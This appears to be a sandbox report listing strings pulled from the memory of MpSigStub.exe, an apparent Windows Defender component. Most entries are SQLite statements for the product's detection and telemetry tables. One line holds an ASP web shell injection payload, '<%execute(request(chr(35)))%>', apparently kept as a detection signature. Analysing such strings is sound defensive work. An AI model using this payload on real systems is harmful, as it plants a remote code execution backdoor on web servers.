Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: SELECT ID, PPIDHash, ProcessStartTime, PID, StructVersion, ImageFileName, MonitoringFlags_Flags, MonitoringFlags_VmHardenType, MonitoringFlags_ExemptVmHardenedTypes, CommandLineArgs, HipsInjectionId, FolderGuardId, Flags, LsassReadMemId, MonitoringFlags_Flags2Low, MonitoringFlags_Flags2High FROM BmProcessInfo WHERE PPIDHash = ?;
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO AutoFeatureControl(Key, CurrCount, MaxCount, InstanceTimeStamp) VALUES (?, ?, ?, ?);
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: SELECT Key FROM AtomicCounters ORDER BY InsertTime ASC LIMIT 1;
Source: MpSigStub.exe, 00000023.00000003.6245821997.0000028BC8334000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO AtomicCounters(Key, Name, Count, InsertTime, ExpireTime) VALUES(? , ? , ? , ? , ?);
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(20, 1, date('now'));
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: SELECT PersistId, PersistIdBlob, ExpirationDate FROM AmsiFileCache WHERE PersistId = ?;
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(31, 1, date('now'));
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: SELECT Key FROM AtomicCounters WHERE AtomicCounters.Key = ?;
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(18, 1, date('now'));
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: SELECT ID FROM BmProcessInfo WHERE PPIDHash = ?;
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: SELECT COUNT(1) FROM AnomalyInfo;
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: SELECT ValueMapArrayBlob FROM ValueMapArray WHERE Key = ? AND RecordType = ?;
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: SELECT ID FROM SystemFileCache WHERE InfectedFileSHAHash = ? OR ProcFileIDSystemFileHash = ?;
Source: MpSigStub.exe, 00000023.00000003.6245821997.0000028BC8334000.00000004.00000001.sdmp	Binary or memory string: SELECT Key FROM AttributeCounts WHERE AttributeCounts.Key = ?;
Source: MpSigStub.exe, 00000023.00000003.6245821997.0000028BC8334000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO DynSigRevisions(Key, SdnRevision, EsuRevision, BFRevision, EntCertRevision, TamperRevision, AGBlobRevision, BFFileAllowRevision, BFFileBlockRevision, BFCertAllowRevision, BFCertBlockRevision) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?);DELETE FROM DynSigRevisions WHERE DynSigRevisions.Key = ?;SELECT Key, SdnRevision, EsuRevision, BFRevision, EntCertRevision, TamperRevision, AGBlobRevision, BFFileAllowRevision, BFFileBlockRevision, BFCertAllowRevision, BFCertBlockRevision FROM DynSigRevisions WHERE Key = ?SELECT Count(1) FROM DynSigRevisions;SELECT ID FROM DynSigRevisions WHERE DynSigRevisions.Key = ?;
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: SELECT Key FROM AttributeCounts ORDER BY InsertTime ASC LIMIT 1;
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: SELECT t1.ProcessPath, t1.TimeStamp, t1.TargetPath, t1.RuleId, t1.IsAudit, t1.Action, t1.ProcessTaintReason, t1.ProcessIntegrity FROM ProcessBlockHistory AS t1 INNER JOIN(SELECT ID, ProcessPath, MAX(TimeStamp) AS MostRecentTime FROM ProcessBlockHistory WHERE RuleId = ? GROUP BY ProcessPath) AS t2 ON t1.ID = t2.ID AND t1.TimeStamp = t2.MostRecentTime ORDER BY t1.TimeStamp DESC;
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: SELECT Key FROM ValueMapArray WHERE ValueMapArray.Key = ? AND ValueMapArray.RecordType = ?;
Source: MpSigStub.exe, 00000023.00000003.6245821997.0000028BC8334000.00000004.00000001.sdmp	Binary or memory string: SELECT COUNT(1) FROM AtomicCounters; SELECT Key FROM AtomicCounters ORDER BY InsertTime ASC LIMIT 1; SELECT Key, Name, Count, InsertTime, ExpireTime FROM AtomicCounters WHERE Key = ?; DELETE FROM AtomicCounters; DELETE FROM AtomicCounters WHERE ExpireTime < ?; DELETE FROM AtomicCounters WHERE AtomicCounters.Key = ?; SELECT Key FROM AtomicCounters WHERE AtomicCounters.Key = ?; UPDATE AtomicCounters SET Name = ?, Count = ?, InsertTime = ?, ExpireTime = ? WHERE Key = ?; INSERT INTO AtomicCounters(Key, Name, Count, InsertTime, ExpireTime) VALUES(? , ? , ? , ? , ?);
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(21, 1, date('now'));
Source: MpSigStub.exe, 00000023.00000003.6245821997.0000028BC8334000.00000004.00000001.sdmp	Binary or memory string: SELECT Key, Name, Count, InsertTime, ExpireTime FROM AtomicCounters WHERE Key = ?;
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: SELECT Count(1) FROM BmFileInfo;
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: SELECT COUNT(1) FROM AtomicCounters;
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: SELECT ThreatRecordId, Action FROM BmFileActions WHERE FileInfoId == ?;
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(17, 1, date('now'));
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO BmHipsRuleInfo(ProcessInfoId, RuleAction, RuleId, IsAudit, IsInherited, State) VALUES (?, ?, ?, ?, ?, ?);
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: UPDATE AttributePersistContext SET FilePath = ?, Context = ?, InsertTime = ?, ExpireTime = ? WHERE Key = ?;
Source: MpSigStub.exe, 00000023.00000003.6245821997.0000028BC8334000.00000004.00000001.sdmp	Binary or memory string: SELECT ProcessPath, TimeStamp FROM ProcessBlockHistory ORDER BY TimeStamp ASC LIMIT 1REPLACE INTO ProcessBlockHistory(ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity) VALUES (?, ?, ?, ?, ?, ?, ?, ?);DELETE FROM ProcessBlockHistory WHERE TimeStamp < ?;SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE ProcessPath = ? ORDER BY TimeStamp DESC LIMIT 1;SELECT t1.ProcessPath, t1.TimeStamp, t1.TargetPath, t1.RuleId, t1.IsAudit, t1.Action, t1.ProcessTaintReason, t1.ProcessIntegrity FROM ProcessBlockHistory AS t1 INNER JOIN(SELECT ID, ProcessPath, MAX(TimeStamp) AS MostRecentTime FROM ProcessBlockHistory WHERE RuleId = ? GROUP BY ProcessPath) AS t2 ON t1.ID = t2.ID AND t1.TimeStamp = t2.MostRecentTime ORDER BY t1.TimeStamp DESC;DELETE FROM ProcessBlockHistory;SELECT COUNT(DISTINCT ProcessPath) FROM ProcessBlockHistory;SELECT COUNT(1) FROM ProcessBlockHistory;SELECT ID FROM ProcessBlockHistory WHERE ProcessPath = ?;SELECT t1.ProcessPath, t1.TimeStamp, t1.TargetPath, t1.RuleId, t1.IsAudit, t1.Action, t1.ProcessTaintReason, t1.ProcessIntegrity FROM ProcessBlockHistory AS t1 INNER JOIN(SELECT ID, ProcessPath, MAX(TimeStamp) AS MostRecentTime FROM ProcessBlockHistory GROUP BY ProcessPath) AS t2 ON t1.ID = t2.ID AND t1.TimeStamp = t2.MostRecentTime ORDER BY t1.TimeStamp DESC;DELETE FROM ProcessBlockHistory WHERE ProcessPath = ? AND TimeStamp = ?;SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE ProcessPath = ? AND TimeStamp = ? ORDER BY TimeStamp DESC;SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory ORDER BY TimeStamp DESC;SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE ProcessPath = ? ORDER BY TimeStamp DESC;SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE RuleId = ? ORDER BY TimeStamp DESC;[3
Source: MpSigStub.exe, 00000023.00000003.6321337544.0000028BD6471000.00000004.00000001.sdmp	Binary or memory string: SELECT information FROM tdata where dataname = '%s' and g_name = '%s';
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO ProcessInfo(FileName, ProcessId, CommandLine, StartTime, TokenElevation, TokenElevationType, IntegrityLevel) VALUES(? , ? , ? , ? , ? , ? , ? );
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: SELECT Key, RecordTimeStamp, Generation FROM RecordIdentifier WHERE ID = ?;
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: SELECT Key FROM AttributePersistContext WHERE AttributePersistContext.Key = ?;
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(19, 1, date('now'));
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: SELECT ID FROM NetworkIpFirewallRules WHERE NetworkIpFirewallRules.Key = ?;
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO BackupProcessInfo(Key, FilePath, FirstStartTime, NextUSN, AutomaticRemovalPolicy, ImpactedCBPNameSpaces, InstanceTimeStamp) VALUES ( ?, ?, ?, ?, ?, ?, ?);
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(22, 1, date('now'));
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: SELECT ID FROM RansomwareDetections WHERE Key = ?;
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: SELECT ID FROM SdnEx WHERE SdnEx.Key = ?;
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(29, 1, date('now'));
Source: MpSigStub.exe, 00000023.00000003.6245821997.0000028BC8334000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO BmFileStartupActions(FilePathHash, FilePath, ActionFlags, ProcessStartCount, FdrFlags, FdrThreatRecordId, EvaluatorThreatRecordId, TrustedInstallerThreatRecordId, LFRThreatRecordId) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?);SELECT ID FROM BmFileStartupActions WHERE BmFileStartupActions.FilePathHash = ?;SELECT FilePathHash, FilePath, ActionFlags, ProcessStartCount, FdrFlags, FdrThreatRecordId, EvaluatorThreatRecordId, TrustedInstallerThreatRecordId, LFRThreatRecordId FROM BmFileStartupActions WHERE FilePathHash = ?DELETE FROM BmFileStartupActions WHERE BmFileStartupActions.FilePathHash = ?;SELECT Count(1) FROM BmFileStartupActions;\|
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: SELECT ID FROM SystemRegistryCache WHERE Key = ?;
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: SELECT COUNT(1) FROM AttributeCounts;
Source: MpSigStub.exe, 00000023.00000003.6345763717.0000028BD65BB000.00000004.00000001.sdmp	Binary or memory string: insertinto[bin_cmd](cmd)values('<%execute(request(chr(35)))%>')
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: SELECT Count(1) FROM AmsiFileCache;
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: SELECT Key FROM AnomalyTables WHERE AnomalyTables.TableKey = ?;
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO SystemRegistryCache(Key, FileIDHash, RegPath, RegOperation, NewRegType, OldRegType, OldRegData, NewRegData, InstanceTimeStamp) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?);
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO AtomicCounters(Key, Name, Count, InsertTime, ExpireTime, UpdateTime) VALUES(? , ? , ? , ? , ? , ?);
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO File(SHA1, MD5, lshashs, lshash, PartialCRC1, PartialCRC2, PartialCRC3, KCRC1, KCRC2, KCRC3, KCRC3n, Size, SHA256) VALUES(? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ?, ?, ? );
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(30, 1, date('now'));
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(23, 1, date('now'));
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: SELECT COUNT(1) FROM RollingQueuesValues;
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO SdnEx(Key, CurrentCount) VALUES (?, ?);
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(15, 1, date('now'));
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(10, 1, date('now'));
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO BmProcessInfo(PPIDHash, ProcessStartTime, PID, StructVersion, ImageFileName, MonitoringFlags_Flags, MonitoringFlags_VmHardenType, MonitoringFlags_ExemptVmHardenedTypes, CommandLineArgs, HipsInjectionId, FolderGuardId, Flags, LsassReadMemId, MonitoringFlags_Flags2Low, MonitoringFlags_Flags2High)VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?);
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: SELECT Count(1) FROM BackupProcessInfo;
Source: MpSigStub.exe, 00000023.00000003.6227003671.0000028BC70EC000.00000004.00000001.sdmp	Binary or memory string: SELECT Key, FilePath, Context, InsertTime, ExpireTime FROM AttributePersistContext WHERE Key = ?;
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: SELECT FileInstance.ID FROM FileInstance, RecordIdentifier WHERE FileInstance.RecordID = RecordIdentifier.ID AND RecordIdentifier.Key = ?;
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory ORDER BY TimeStamp DESC;DELETE FROM ProcessBlockHistory WHERE ProcessPath = ? AND TimeStamp = ?;SELECT COUNT(1) FROM ProcessBlockHistory;SELECT t1.ProcessPath, t1.TimeStamp, t1.TargetPath, t1.RuleId, t1.IsAudit, t1.Action, t1.ProcessTaintReason, t1.ProcessIntegrity FROM ProcessBlockHistory AS t1 INNER JOIN(SELECT ID, ProcessPath, MAX(TimeStamp) AS MostRecentTime FROM ProcessBlockHistory WHERE RuleId = ? GROUP BY ProcessPath) AS t2 ON t1.ID = t2.ID AND t1.TimeStamp = t2.MostRecentTime ORDER BY t1.TimeStamp DESC;SELECT t1.ProcessPath, t1.TimeStamp, t1.TargetPath, t1.RuleId, t1.IsAudit, t1.Action, t1.ProcessTaintReason, t1.ProcessIntegrity FROM ProcessBlockHistory AS t1 INNER JOIN(SELECT ID, ProcessPath, MAX(TimeStamp) AS MostRecentTime FROM ProcessBlockHistory GROUP BY ProcessPath) AS t2 ON t1.ID = t2.ID AND t1.TimeStamp = t2.MostRecentTime ORDER BY t1.TimeStamp DESC;SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE RuleId = ? ORDER BY TimeStamp DESC;SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE ProcessPath = ? AND TimeStamp = ? ORDER BY TimeStamp DESC;SELECT ID FROM ProcessBlockHistory WHERE ProcessPath = ?;SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE ProcessPath = ? ORDER BY TimeStamp DESC;DELETE FROM ProcessBlockHistory WHERE TimeStamp < ?;SELECT ProcessPath, TimeStamp FROM ProcessBlockHistory ORDER BY TimeStamp ASC LIMIT 1SELECT COUNT(DISTINCT ProcessPath) FROM ProcessBlockHistory;SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE ProcessPath = ? ORDER BY TimeStamp DESC LIMIT 1;REPLACE INTO ProcessBlockHistory(ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity) VALUES (?, ?, ?, ?, ?, ?, ?, ?);DELETE FROM ProcessBlockHistory;[3
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: SELECT RecordIdentifier.Key, FileInstance.RecordID, RecordIdentifier.RecordTimeStamp, FileInstance.TrackingEnabled, FileInstance.StorageEvent, FileInstance.StorageEventState, FileInstance.ModificationsCount, FileInstance.ParentRecordID, FileInstance.Parent_FileEvent, FileInstance.Parent_FileName, RecordIdentifier.Generation, FileInstance.FileName, FileInstance.USN, FileInstance.CreateTime, FileInstance.LastAccessTime, FileInstance.LastWriteTime, FileInstance.Signer, FileInstance.SignerHash, FileInstance.Issuer, FileInstance.SigningTime, FileInstance.MOTW, FileInstance.MOTWFromParent, FileInstance.IsValidCert, FileInstance.CertInvalidDetails, FileInstance.IsCatalogSigned, File.SHA1, File.MD5, File.lshashs, File.lshash, File.PartialCRC1, File.PartialCRC2, File.PartialCRC3, File.KCRC1, File.KCRC2, File.KCRC3, File.KCRC3n, File.Size, File.SHA256, ParentProcessInfo.CommandLine, ParentProcessInfo.FileName, ParentProcessInfo.IntegrityLevel, ParentProcessInfo.ProcessId, ParentProcessInfo.StartTime, ParentProcessInfo.TokenElevation, ParentProcessInfo.TokenElevationType, RemoteProcessInfo.CommandLine, RemoteProcessInfo.FileName, RemoteProcessInfo.IntegrityLevel, RemoteProcessInfo.TokenElevation, RemoteProcessInfo.TokenElevationType, ScanInfo.NamedAttributes, ScanInfo.PeAttributes, ScanInfo.PersistSigSeq, ScanInfo.ProgenitorPersistSigSeq, ScanInfo.ScanAgent, ScanInfo.ScanReason, ScanInfo.SigAttrEvents, ScanInfo.SigSeq, ScanInfo.SigSha, ScanInfo.WebURL,Engine.EngineVersion, Engine.SigVersion FROM RecordIdentifier INNER JOIN (FileInstance INNER JOIN File ON FileInstance.FileID = File.ID LEFT OUTER JOIN ProcessInfo as 'ParentProcessInfo' ON FileInstance.Parent_ProcessID = ParentProcessInfo.ID LEFT OUTER JOIN ProcessInfo as 'RemoteProcessInfo' ON FileInstance.Remote_ProcessID = RemoteProcessInfo.ID LEFT OUTER JOIN (ScanInfo INNER JOIN Engine ON ScanInfo.EngineID = Engine.ID) ON FileInstance.ScanID = ScanInfo.ID ) ON RecordIdentifier.ID = FileInstance.RecordID WHERE RecordIdentifier.Key = ?;
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: UPDATE AtomicCounters SET Name = ?, Count = ?, InsertTime = ?, ExpireTime = ?, UpdateTime = ?, WHERE Key = ?;
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(9, 1, date('now'));
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: SELECT Count(1) FROM DynSigRevisions;
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: SELECT COUNT(1) FROM ProcessBlockHistory;
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: SELECT Count(1) FROM BmProcessInfo;
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO ValueMapArray(Key, RecordType, ValueMapArrayBlob, InstanceTimeStamp) VALUES(?, ? , ? , ?);
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: SELECT Key, Name, Count, InsertTime, ExpireTime FROM AttributeCounts WHERE Key = ?;
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: SELECT Key, FileName, SigSeq, SigSha, SigIsSync, InstanceTimeStamp FROM FileLowFiAsync WHERE Key = ?;
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: SELECT ID FROM BmFileStartupActions WHERE BmFileStartupActions.FilePathHash = ?;
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: SELECT COUNT(1) FROM FileHashes;
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: SELECT Key FROM FileLowFiAsync WHERE FileLowFiAsync.Key = ?;
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO RecordIdentifier(Key, RecordTimeStamp, Generation) VALUES(?, ?, ?);
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(27, 1, date('now'));
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO FileHashes(Key, VSN, FileID, USN, InstanceTimeStamp, SHA1, MD5, SHA256, LSHASH, LSHASHS, CTPH, PartialCRC1, PartialCRC2, PartialCRC3, KCRC1, KCRC2, KCRC3, KCRC3n) VALUES(?, ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ?);
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: SELECT DetectionGuid, LkgTS, NextUSN, DetectionTS, ProvisionalRemedComplTS, RemedComplTS, ImpactedCBPNameSpaces FROM RansomwareDetections WHERE Key = ?;
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO NetworkIpFirewallRules(Key, FirewallRuleName, ExpiryTime) VALUES (?, ?, ?);
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: SELECT FilePath, FirstStartTime, NextUSN, AutomaticRemovalPolicy, ImpactedCBPNameSpaces FROM BackupProcessInfo WHERE Key = ?;
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(7, 1, date('now'));
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: SELECT Key FROM RollingQueuesTables WHERE RollingQueuesTables.Key = ?;
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: SELECT InfectedFileSHA, ProcFileId, SystemFilePath, CleanFileSha FROM SystemFileCache WHERE InfectedFileSHAHash = ? OR ProcFileIDSystemFileHash = ? ORDER BY InstanceTimeStamp DESC;SELECT ID FROM SystemFileCache WHERE InfectedFileSHAHash = ? OR ProcFileIDSystemFileHash = ?;DELETE FROM SystemFileCache WHERE InstanceTimeStamp < ?; SELECT Count(1) FROM SystemFileCache WHERE CleanFileShaHash = ?; INSERT INTO SystemFileCache(InfectedFileSHAHash, InfectedFileSHA, ProcFileIDSystemFileHash, ProcFileId, SystemFilePath, CleanFileSha, CleanFileShaHash, InstanceTimeStamp) VALUES ( ?, ?, ?, ?, ?, ?, ?, ?);SELECT CleanFileSha, CleanFileShaHash FROM SystemFileCache WHERE InstanceTimeStamp < ?; SELECT Count(1) FROM SystemFileCache;DELETE FROM SystemFileCache WHERE InfectedFileSHAHash = ? OR ProcFileIDSystemFileHash = ?;2
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: SELECT Key FROM AttributePersistContext WHERE AttributePersistContext.Key = ?; DELETE FROM AttributePersistContext WHERE AttributePersistContext.Key = ?; SELECT COUNT(1) FROM AttributePersistContext; DELETE FROM AttributePersistContext WHERE ExpireTime < ?; SELECT Key FROM AttributePersistContext ORDER BY InsertTime ASC LIMIT 1; INSERT INTO AttributePersistContext(Key, FilePath, Context, InsertTime, ExpireTime) VALUES(? , ? , ? , ? , ?); UPDATE AttributePersistContext SET FilePath = ?, Context = ?, InsertTime = ?, ExpireTime = ? WHERE Key = ?;
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory ORDER BY TimeStamp DESC;
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(2, 1, date('now'));
